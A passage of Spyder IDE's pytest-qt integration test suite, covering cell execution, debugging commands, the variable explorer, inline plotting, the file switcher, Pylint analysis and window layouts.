                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Run cell and advance ----
    # Run the five cells present in file
    # Add an unnamed cell at the top of the file
    qtbot.keyClicks(code_editor, 'a = 10')
    qtbot.keyClick(code_editor, Qt.Key_Return)
    qtbot.keyClick(code_editor, Qt.Key_Up)
    for _ in range(5):
        qtbot.keyClick(code_editor, Qt.Key_Return,
                       modifier=Qt.ShiftModifier)
        qtbot.wait(500)

    # Check for errors and the runcell function
    assert 'runcell' in shell._control.toPlainText()
    assert 'Error:' not in shell._control.toPlainText()
    control_text = shell._control.toPlainText()

    # Rerun
    shell.setFocus()
    qtbot.keyClick(shell._control, Qt.Key_Up)
    qtbot.wait(500)
    qtbot.keyClick(shell._control, Qt.Key_Enter,
                   modifier=Qt.ShiftModifier)
    qtbot.wait(500)
    code_editor.setFocus()

    assert control_text != shell._control.toPlainText()
    # Only keep the console output produced by the rerun
    control_text = shell._control.toPlainText()[len(control_text):]

    # Check for errors and the runcell function
    assert 'runcell' in control_text
    assert 'Error' not in control_text

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert ']: 10\n' in shell._control.toPlainText()
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Run cell ----
    # Run the first cell in file
    modifier = Qt.ControlModifier
    if sys.platform == 'darwin':
        modifier = Qt.MetaModifier
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)

    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('a') == 10

    # Press Ctrl+Enter a second time to verify that we're *not* advancing
    # to the next cell
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
    assert nsb.editor.source_model.rowCount() == 1

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Debug cell ------
    with qtbot.waitSignal(shell.executed):
        qtbot.keyClick(code_editor, Qt.Key_Return,
                       modifier=Qt.AltModifier | Qt.ShiftModifier)
    qtbot.keyClicks(shell._control, '!c')
    qtbot.keyClick(shell._control, Qt.Key_Enter)

    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Re-run last cell ----
    # Run the first three cells in file
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.wait(500)
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
    qtbot.wait(500)
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)

    # Wait until objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2,
                    timeout=EVAL_TIMEOUT)

    # Clean namespace
    with qtbot.waitSignal(shell.executed):
        shell.execute('%reset -f')

    # Wait until there are no objects in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
                    timeout=EVAL_TIMEOUT)

    # Re-run last cell
    qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier)

    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)
    assert shell.get_value('li') == [1, 2, 3]

    # ---- Closing test file ----
    main_window.editor.close_file()


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
@pytest.mark.parametrize('main_window',
                         [{'spy_config': ('editor', 'run_cell_copy', True)}],
                         indirect=True)
def test_run_cell_copy(main_window, qtbot, tmpdir):
    """Test all the different ways we have to run code."""
    # ---- Setup ----
    p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
         .join(u"runtest's file èáïü Øαôå 字分误.py"))
    filepath = to_text_string(p)
    shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Make sure run_cell_copy is properly set
    for editorstack in main_window.editor.editorstacks:
        editorstack.set_run_cell_copy(True)

    # Load test file
    main_window.editor.load(filepath)

    # Move to the editor's first line
    code_editor = main_window.editor.get_focus_widget()
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # ---- Run cell and advance ----
    # Run the three cells present in file
    for _ in range(4):
        qtbot.keyClick(code_editor, Qt.Key_Return,
                       modifier=Qt.ShiftModifier)
        qtbot.wait(500)

    # Check for errors and the copied code
    assert 'runcell' not in shell._control.toPlainText()
    assert 'a = 10' in shell._control.toPlainText()
    assert 'Error:' not in shell._control.toPlainText()

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert ']: 10\n' in shell._control.toPlainText()
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    # ---- Closing test file and reset config ----
    main_window.editor.close_file()
    CONF.set('editor', 'run_cell_copy', False)


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(running_in_ci(), reason="Fails on CIs")
def test_open_files_in_new_editor_window(main_window, qtbot):
    """
    This tests that opening files in a new editor window
    is working as expected.

    Test for spyder-ide/spyder#4085.
    """
    # Set a timer to manipulate the open dialog while it's running
    QTimer.singleShot(2000, lambda: open_file_in_editor(main_window,
                                                        'script.py',
                                                        directory=LOCATION))

    # Create a new editor window
    # Note: editor.load() uses the current editorstack by default
    main_window.editor.create_new_window()
    main_window.editor.load()

    # Perform the test
    # Note: There's always one file open in the Editor
    editorstack = main_window.editor.get_current_editorstack()
    assert editorstack.get_stack_count() == 2


@pytest.mark.slow
@flaky(max_runs=3)
def test_close_when_file_is_changed(main_window, qtbot):
    """Test closing spyder when there is a file with modifications open."""
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)
    editorstack = main_window.editor.get_current_editorstack()
    editor = editorstack.get_current_editor()
    editor.document().setModified(True)

    # Wait for the segfault
    qtbot.wait(3000)


@pytest.mark.slow
@flaky(max_runs=3)
def test_maximize_minimize_plugins(main_window, qtbot):
    """Test that the maximize button is working correctly."""
    # Set focus to the Editor
    main_window.editor.get_focus_widget().setFocus()

    # Click the maximize button
    max_action = main_window.layouts.maximize_action
    max_button = main_window.main_toolbar.widgetForAction(max_action)
    qtbot.mouseClick(max_button, Qt.LeftButton)

    # Verify that the Editor is maximized
    assert main_window.editor._ismaximized

    # Verify that the action minimizes the plugin too
    qtbot.mouseClick(max_button, Qt.LeftButton)
    assert not main_window.editor._ismaximized


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    os.name == 'nt' or running_in_ci() and PYQT_VERSION >= '5.9',
    reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9")
def test_issue_4066(main_window, qtbot):
    """
    Test for a segfault when these steps are followed:

    1. Open an object present in the Variable Explorer (e.g. a list).
    2. Delete that object in its corresponding console while its
       editor is still open.
    3. Closing that editor by pressing its *Ok* button.
    """
    # Create the object
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('myobj = [1, 2, 3]')

    # Open editor associated with that object and get a reference to it
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0,
                    timeout=EVAL_TIMEOUT)
    nsb.editor.setFocus()
    nsb.editor.edit_item()
    obj_editor_id = list(nsb.editor.delegate._editors.keys())[0]
    obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor']

    # Move to the IPython console and delete that object
    main_window.ipyconsole.get_widget().get_focus_widget().setFocus()
    with qtbot.waitSignal(shell.executed):
        shell.execute('del myobj')
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
                    timeout=EVAL_TIMEOUT)

    # Close editor
    ok_widget = obj_editor.btn_close
    qtbot.mouseClick(ok_widget, Qt.LeftButton)

    # Wait for the segfault
    qtbot.wait(3000)


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt',
                    reason="It times out sometimes on Windows")
def test_varexp_edit_inline(main_window, qtbot):
    """
    Test for 
errors when editing inline values in the Variable Explorer and then moving to another plugin. Note: Errors for this test don't appear related to it but instead they are shown down the road. That's because they are generated by an async C++ RuntimeError. """ # Create object shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) with qtbot.waitSignal(shell.executed): shell.execute('a = 10') # Edit object main_window.variableexplorer.change_visibility(True) nsb = main_window.variableexplorer.current_widget() qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT) nsb.editor.setFocus() nsb.editor.edit_item() # Change focus to IPython console main_window.ipyconsole.get_widget().get_focus_widget().setFocus() # Wait for the error qtbot.wait(3000) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="It times out sometimes on Windows and macOS") def test_c_and_n_pdb_commands(main_window, qtbot): """Test that c and n Pdb commands update the Variable Explorer.""" nsb = main_window.variableexplorer.current_widget() # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() control = shell._control qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # Load test file test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) # Click the debug button debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # Set a breakpoint code_editor = main_window.editor.get_focus_widget() code_editor.debugger.toogle_breakpoint(line_number=6) qtbot.wait(500) # Verify that c works with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, 
'!c') qtbot.keyClick(control, Qt.Key_Enter) qtbot.waitUntil( lambda: nsb.editor.source_model.rowCount() == 1) # Verify that n works with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) qtbot.waitUntil( lambda: nsb.editor.source_model.rowCount() == 2) # Verify that doesn't go to sitecustomize.py with next and stops # the debugging session. with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) qtbot.waitUntil( lambda: nsb.editor.source_model.rowCount() == 3) with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) # Assert that the prompt appear shell.clear_console() assert 'In [2]:' in control.toPlainText() # Remove breakpoint and close test file main_window.editor.clear_all_breakpoints() main_window.editor.close_file() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows") def test_stop_dbg(main_window, qtbot): """Test that we correctly stop a debugging session.""" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # Load test file test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) # Click the debug button debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # Move 
to the next line with qtbot.waitSignal(shell.executed): shell.pdb_execute("!n") # Stop debugging stop_debug_action = main_window.debug_toolbar_actions[5] stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action) with qtbot.waitSignal(shell.executed): qtbot.mouseClick(stop_debug_button, Qt.LeftButton) # Assert there are only two ipdb prompts in the console assert shell._control.toPlainText().count('IPdb') == 2 # Remove breakpoint and close test file main_window.editor.clear_all_breakpoints() main_window.editor.close_file() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="It only works on Linux") def test_change_cwd_dbg(main_window, qtbot): """ Test that using the Working directory toolbar is working while debugging. """ # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Load test file to be able to enter in debugging mode test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) # Give focus to the widget that's going to receive clicks control = main_window.ipyconsole.get_widget().get_focus_widget() control.setFocus() # Click the debug button debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) qtbot.mouseClick(debug_button, Qt.LeftButton) qtbot.wait(1000) # Set LOCATION as cwd main_window.workingdirectory.chdir(tempfile.gettempdir()) qtbot.wait(1000) print(repr(control.toPlainText())) shell.clear_console() qtbot.wait(500) # Get cwd in console qtbot.keyClicks(control, 'import os; os.getcwd()') qtbot.keyClick(control, Qt.Key_Enter) qtbot.wait(1000) # Assert cwd is the right one assert tempfile.gettempdir() in control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt', reason="Times out sometimes") def test_varexp_magic_dbg(main_window, qtbot): 
"""Test that %varexp is working while debugging.""" nsb = main_window.variableexplorer.current_widget() # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Load test file to be able to enter in debugging mode test_file = osp.join(LOCATION, 'script.py') main_window.editor.load(test_file) # Give focus to the widget that's going to receive clicks control = main_window.ipyconsole.get_widget().get_focus_widget() control.setFocus() # Click the debug button debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # Get to an object that can be plotted for _ in range(3): with qtbot.waitSignal(shell.executed): qtbot.keyClicks(control, '!n') qtbot.keyClick(control, Qt.Key_Enter) # Generate the plot from the Variable Explorer nsb.editor.plot('li', 'plot') qtbot.wait(1000) # Assert that there's a plot in the console assert shell._control.toHtml().count('img src') == 1 @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(PY2, reason="It times out sometimes") @pytest.mark.parametrize( 'main_window', [{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)}, {'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}], indirect=True) def test_plots_plugin(main_window, qtbot, tmpdir, mocker): """ Test that plots generated in the IPython console are properly displayed in the plots plugin. """ assert CONF.get('plots', 'mute_inline_plotting') is False shell = main_window.ipyconsole.get_current_shellwidget() figbrowser = main_window.plots.current_widget() # Wait until the window is fully up. qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Generate a plot inline. 
with qtbot.waitSignal(shell.executed): shell.execute(("import matplotlib.pyplot as plt\n" "fig = plt.plot([1, 2, 3, 4], '.')\n")) if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0: assert figbrowser.figviewer.figcanvas.fmt == 'image/png' else: assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml' # Get the image name from the html, fetch the image from the shell, and # save it as a png. html = shell._control.toHtml() img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1) ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png') ipython_qimg = shell._get_image(img_name) ipython_qimg.save(ipython_figname) # Save the image with the Plots plugin as a png. plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png') mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename', return_value=(plots_figname, '.png')) figbrowser.save_figure() assert compare_images(ipython_figname, plots_figname, 0.1) is None @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif( (parse_version(ipy_release.version) >= parse_version('7.23.0') and parse_version(ipykernel.__version__) <= parse_version('5.5.3')), reason="Fails due to a bug in the %matplotlib magic") def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir): """ Test that the option to set bbox_inches to 'tight' or 'None' is working when plotting inline in the IPython console. By default, figures are plotted inline with bbox_inches='tight'. """ tmpdir = to_text_string(tmpdir) # Assert that the default is True. assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution')) fig_width = float(CONF.get('ipython_console', 'pylab/inline/width')) fig_height = float(CONF.get('ipython_console', 'pylab/inline/height')) # Wait until the window is fully up. 
shell = main_window.ipyconsole.get_current_shellwidget() client = main_window.ipyconsole.get_current_client() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Give focus to the widget that's going to receive clicks control = main_window.ipyconsole.get_widget().get_focus_widget() control.setFocus() # Generate a plot inline with bbox_inches=tight (since it is default) and # save the figure with savefig. savefig_figname = osp.join( tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/') with qtbot.waitSignal(shell.executed): shell.execute(("import matplotlib.pyplot as plt\n" "fig, ax = plt.subplots()\n" "fig.set_size_inches(%f, %f)\n" "ax.set_position([0.25, 0.25, 0.5, 0.5])\n" "ax.set_xticks(range(10))\n" "ax.xaxis.set_ticklabels([])\n" "ax.set_yticks(range(10))\n" "ax.yaxis.set_ticklabels([])\n" "ax.tick_params(axis='both', length=0)\n" "for loc in ax.spines:\n" " ax.spines[loc].set_color('#000000')\n" " ax.spines[loc].set_linewidth(2)\n" "ax.axis([0, 9, 0, 9])\n" "ax.plot(range(10), color='#000000', lw=2)\n" "fig.savefig('%s',\n" " bbox_inches='tight',\n" " dpi=%f)" ) % (fig_width, fig_height, savefig_figname, fig_dpi)) # Get the image name from the html, fetch the image from the shell, and # then save it to a file. html = shell._control.toHtml() img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1) qimg = shell._get_image(img_name) assert isinstance(qimg, QImage) # Save the inline figure and assert it is similar to the one generated # with savefig. inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png') qimg.save(inline_figname) assert compare_images(savefig_figname, inline_figname, 0.1) is None # Change the option so that bbox_inches=None. 
CONF.set('ipython_console', 'pylab/inline/bbox_inches', False) # Restart the kernel and wait until it's up again shell._prompt_html = None client.restart_kernel() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Generate the same plot inline with bbox_inches='tight' and save the # figure with savefig. savefig_figname = osp.join( tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/') with qtbot.waitSignal(shell.executed): shell.execute(("import matplotlib.pyplot as plt\n" "fig, ax = plt.subplots()\n" "fig.set_size_inches(%f, %f)\n" "ax.set_position([0.25, 0.25, 0.5, 0.5])\n" "ax.set_xticks(range(10))\n" "ax.xaxis.set_ticklabels([])\n" "ax.set_yticks(range(10))\n" "ax.yaxis.set_ticklabels([])\n" "ax.tick_params(axis='both', length=0)\n" "for loc in ax.spines:\n" " ax.spines[loc].set_color('#000000')\n" " ax.spines[loc].set_linewidth(2)\n" "ax.axis([0, 9, 0, 9])\n" "ax.plot(range(10), color='#000000', lw=2)\n" "fig.savefig('%s',\n" " bbox_inches=None,\n" " dpi=%f)" ) % (fig_width, fig_height, savefig_figname, fig_dpi)) # Get the image name from the html, fetch the image from the shell, and # then save it to a file. html = shell._control.toHtml() img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1) qimg = shell._get_image(img_name) assert isinstance(qimg, QImage) # Save the inline figure and assert it is similar to the one generated # with savefig. 
    inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png')
    qimg.save(inline_figname)
    assert compare_images(savefig_figname, inline_figname, 0.1) is None


# FIXME: Make this test work again in our CIs (it's passing locally)
@pytest.mark.skip
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
def test_switcher(main_window, qtbot, tmpdir):
    """Test the use of shorten paths when necessary in the switcher."""
    switcher = main_window.switcher

    # Assert that the full path of a file is shown in the switcher
    file_a = tmpdir.join('test_file_a.py')
    file_a.write('''
def example_def():
    pass

def example_def_2():
    pass
''')
    main_window.editor.load(str(file_a))

    main_window.open_switcher()
    switcher_paths = [switcher.model.item(item_idx).get_description()
                      for item_idx in range(switcher.model.rowCount())]
    assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75
    switcher.close()

    # Assert that long paths are shortened in the switcher
    dir_b = tmpdir
    for _ in range(3):
        dir_b = dir_b.mkdir(str(uuid.uuid4()))
    file_b = dir_b.join('test_file_b.py')
    file_b.write('bar\n')
    main_window.editor.load(str(file_b))

    main_window.open_switcher()
    file_b_text = switcher.model.item(
        switcher.model.rowCount() - 1).get_description()
    assert '...' in file_b_text
    switcher.close()

    # Assert search works correctly
    search_texts = ['test_file_a', 'file_b', 'foo_spam']
    expected_paths = [file_a, file_b, None]
    for search_text, expected_path in zip(search_texts, expected_paths):
        main_window.open_switcher()
        qtbot.keyClicks(switcher.edit, search_text)
        qtbot.wait(200)
        # Exactly one match for the first two texts, none for 'foo_spam'
        assert switcher.count() == bool(expected_path)
        switcher.close()

    # Assert symbol switcher works
    main_window.editor.set_current_filename(str(file_a))

    code_editor = main_window.editor.get_focus_widget()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()

    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.request_symbols()

    qtbot.wait(9000)

    main_window.open_switcher()
    qtbot.keyClicks(switcher.edit, '@')
    qtbot.wait(200)
    # The two defs written to file_a above
    assert switcher.count() == 2
    switcher.close()


@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_switcher_dlg(main_window, tmpdir):
    """
    Test that the file switcher is working as expected when called from the
    editorstack.

    Regression test for spyder-ide/spyder#10684
    """
    # Add a file to the editor.
    file = tmpdir.join('test_file_open_switcher_dlg.py')
    file.write("a test file for test_edidorstack_open_switcher_dlg")
    main_window.editor.load(str(file))

    # Test that the file switcher opens as expected from the editorstack.
    editorstack = main_window.editor.get_current_editorstack()
    assert editorstack.switcher_dlg is None
    editorstack.open_switcher_dlg()
    assert editorstack.switcher_dlg
    assert editorstack.switcher_dlg.isVisible()
    assert (editorstack.switcher_dlg.count() ==
            len(main_window.editor.get_filenames()))


@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="It times out too much on Windows and macOS")
def test_editorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir):
    """
    Test that the symbol finder is working as expected when called from the
    editorstack.

    Regression test for spyder-ide/spyder#10684
    """
    # Add a file to the editor.
    file = tmpdir.join('test_file.py')
    file.write('''
def example_def():
    pass

def example_def_2():
    pass
''')
    main_window.editor.load(str(file))

    code_editor = main_window.editor.get_focus_widget()
    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()

    with qtbot.waitSignal(
            code_editor.completions_response_signal, timeout=30000):
        code_editor.request_symbols()

    qtbot.wait(5000)

    # Test that the symbol finder opens as expected from the editorstack.
    editorstack = main_window.editor.get_current_editorstack()
    assert editorstack.switcher_dlg is None
    editorstack.open_symbolfinder_dlg()
    assert editorstack.switcher_dlg
    assert editorstack.switcher_dlg.isVisible()
    # The two defs written to the file above
    assert editorstack.switcher_dlg.count() == 2


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
                    reason="Times out sometimes on macOS")
def test_run_static_code_analysis(main_window, qtbot):
    """This tests that the Pylint plugin is working as expected."""
    from spyder.plugins.pylint.main_widget import PylintWidgetActions
    # Select the third-party plugin
    pylint_plugin = main_window.get_plugin(Plugins.Pylint)

    # Do an analysis
    test_file = osp.join(LOCATION, 'script_pylint.py')
    main_window.editor.load(test_file)
    pylint_plugin.get_action(PylintWidgetActions.RunCodeAnalysis).trigger()
    qtbot.wait(3000)

    # Perform the test
    # Check output of the analysis
    treewidget = pylint_plugin.get_widget().get_focus_widget()
    qtbot.waitUntil(lambda: treewidget.results is not None,
                    timeout=SHELL_TIMEOUT)
    result_content = treewidget.results
    assert result_content['C:']

    # The expected number of convention messages depends on the Pylint
    # version in use
    pylint_version = parse_version(pylint.__version__)
    if pylint_version < parse_version('2.5.0'):
        number_of_conventions = 5
    else:
        number_of_conventions = 3
    assert len(result_content['C:']) == number_of_conventions

    # Close the file
    main_window.editor.close_file()


@flaky(max_runs=3)
@pytest.mark.slow
def test_troubleshooting_menu_item_and_url(main_window, qtbot, monkeypatch):
    """Test that the troubleshooting menu item calls the valid URL."""
    application_plugin = main_window.application
    MockQDesktopServices = Mock()
    mockQDesktopServices_instance = MockQDesktopServices()
    attr_to_patch = ('spyder.utils.qthelpers.QDesktopServices')
    monkeypatch.setattr(attr_to_patch, MockQDesktopServices)

    # Unit test of help menu item: Make sure the correct URL is called.
    application_plugin.trouble_action.trigger()
    assert MockQDesktopServices.openUrl.call_count == 1
    mockQDesktopServices_instance.openUrl.called_once_with(__trouble_url__)


@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows")
def test_help_opens_when_show_tutorial_full(main_window, qtbot):
    """
    Test fix for spyder-ide/spyder#6317.

    'Show tutorial' opens the help plugin if closed.
    """
    HELP_STR = "Help"

    help_pane_menuitem = None
    for action in main_window.layouts.plugins_menu.get_actions():
        if action.text() == HELP_STR:
            help_pane_menuitem = action
            break

    # Test opening tutorial with Help plugin closed
    main_window.help.toggle_view_action.setChecked(False)
    qtbot.wait(500)
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR,
                                                         main_window)
    assert help_tabbar is None and help_index is None
    assert not isinstance(main_window.focusWidget(), ObjectComboBox)
    assert not help_pane_menuitem.isChecked()

    main_window.help.show_tutorial()
    qtbot.wait(500)

    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR,
                                                         main_window)
    assert None not in (help_tabbar, help_index)
    assert help_index == help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()

    # Test opening tutorial with help plugin open, but not selected
    help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1)
                                % help_tabbar.count())
    qtbot.wait(500)
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR,
                                                         main_window)
    assert None not in (help_tabbar, help_index)
    assert help_index != help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()

    main_window.help.show_tutorial()
    qtbot.wait(500)

    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR,
                                                         main_window)
    assert None not in (help_tabbar, help_index)
    assert help_index == help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()

    # Test opening tutorial with help plugin open and the active tab
    qtbot.wait(500)
    main_window.help.show_tutorial()
    help_tabbar, help_index = find_desired_tab_in_window(HELP_STR,
                                                         main_window)
    qtbot.wait(500)
    assert None not in (help_tabbar, help_index)
    assert help_index == help_tabbar.currentIndex()
    assert help_pane_menuitem.isChecked()


@pytest.mark.slow
@flaky(max_runs=3)
def test_report_issue(main_window, qtbot):
    """Test that the report error dialog opens correctly."""
    main_window.console.report_issue()
    qtbot.wait(300)
    assert main_window.console.get_widget()._report_dlg is not None
    assert main_window.console.get_widget()._report_dlg.isVisible()
    assert main_window.console.get_widget()._report_dlg.close()


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    sys.platform.startswith('linux'), reason="It segfaults on Linux")
def test_custom_layouts(main_window, qtbot):
    """Test that layout are showing the expected widgets visible."""
    mw = main_window
    mw.first_spyder_run = False
    prefix = 'window' + '/'
    settings = mw.layouts.load_window_settings(prefix=prefix, default=True)

    # Test layout changes
    for layout_idx in get_class_values(DefaultLayouts):
        with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
            layout = mw.layouts.setup_default_layouts(
                layout_idx, settings=settings)

            qtbot.wait(500)

            for area in layout._areas:
                if area['visible']:
                    for plugin_id in area['plugin_ids']:
                        if plugin_id not in area['hidden_plugin_ids']:
                            plugin = mw.get_plugin(plugin_id)
                            print(plugin)  # spyder: test-skip
                            try:
                                # New API
                                assert plugin.get_widget().isVisible()
                            except AttributeError:
                                # Old API
                                assert plugin.isVisible()


@pytest.mark.slow
@flaky(max_runs=3)
